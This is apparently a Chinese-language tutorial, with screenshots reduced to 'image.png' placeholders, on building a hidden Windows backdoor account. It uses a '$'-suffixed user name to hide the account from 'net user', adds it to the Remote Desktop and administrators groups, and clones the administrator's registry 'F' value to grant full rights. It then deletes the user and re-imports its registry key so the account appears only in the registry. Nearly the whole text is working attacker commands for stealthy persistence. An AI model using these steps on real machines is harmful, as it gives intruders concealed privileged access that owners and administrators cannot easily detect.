net user whoami$ 123456 /add
    net user 无法看到whoami$用户
    image.png
    控制面板-用户账户
    image.png
    用户和组 lusrmgr.msc
    image.png
    直接远程登录
    image.png
    net localgroup //查看组
    image.png
    net localgroup “Remote Desktop users” whoami$ /add //添加远程桌面组
    image.png
    低权限用户 啥也干不了 除非提权。
    image.png
    net localgroup administrators $ /add //加入管理员组后远程桌面
    进入到注册表项 无法进入到用户注册表项
    给当前用户赋予权限然后再重新进入到注册表image.png
    如图 可以进入到用户注册表项了。
    image.png
    复制administrator的F值到whoami$的F值中 拥有administrator权限
    administrator注册表项空及键值对
    image.png
    whoami$注册表项及键值对
    image.png
    导出whoami$注册表项及键值对
    image.png
    image.png
    net user whoami$ /del
    image.png
    将whoami$的注册表项及键值对导入注册表
    image.png
    如图 添加成功
    image.png
    再次检查whoami$用户
    查看控制面板
    image.png
    查看用户和组
    image.png
    只能在注册表看到该用户
    image.png